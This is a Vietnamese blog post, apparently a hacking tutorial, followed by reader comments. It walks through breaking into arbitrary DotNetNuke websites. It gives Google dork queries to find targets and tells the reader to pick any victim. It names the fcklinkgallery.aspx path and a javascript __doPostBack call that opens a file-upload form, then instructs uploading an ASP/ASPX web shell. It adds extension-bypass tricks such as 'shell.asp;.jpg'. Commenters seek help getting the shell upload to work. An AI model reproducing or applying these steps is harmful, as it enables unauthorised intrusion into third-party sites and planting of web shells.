Bước 1: Sử dụng google để tìm site chứa lỗ
hổng DNN
:inurl:/tabid/36/language/en-US/Default.aspxInurl:”/portals/0”
Bước 2: Chọn 1 victim bất kỳ, ví dụ:
Bước 3: Thay thế đoạn url
sau:
/tabid/36/language/en-US/Default.aspx
Bằng đoạn mã url:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Lúc đó, đường link của victim
như sau:
Thông tin thu được:
Bước 4: Tích vào File (A File on your site)
Sau đó thay thế đường link bằng đoạn mã Script đơn giản sau:
javascript:__doPostBack('ctlURL$cmdUpload','')
Sau khi chạy địa chỉ url ở trên sẽ xuất hiện giao diện cho upload file
Bước 5: Upload
shell
Click Browse và upload shell
.asp or. aspx
Thêm 1 số kỹ thuật
upload shell đối với asp,
- Có thể bypass đuôi
file shell sang dạng ảnh như sau: shell.asp;.jpg.
- Hoặc sử dụng
tool http live herder or tamper data….
Bước 6: Run
shell
Một số site dính DNN:
6 nhận xét:
javascript:__doPostBack('ctlURL$cmdUpload','')
đoạn java thay vào đâu bạn
Xóa url của link đi, rồi coppy đoạn java này vào và chạy nếu hiện ra mục upload thì thành công. Tớ có chụp hình rồi đó ;)
tut hay
Hi Dũng
Mình muốn khắc phục lỗi trên thì phải fix lại ntn?
Bạn có thể chia sẽ cách thực hiện ko?
Hi Dũng
Trong file shell kia bạn code ntn để có được table như ảnh đã có bên trên?
Ban oi minh doi duoi shell thanh c100.php.jpg rui ma ko up dk. Chi Cho minh voi
Đăng nhận xét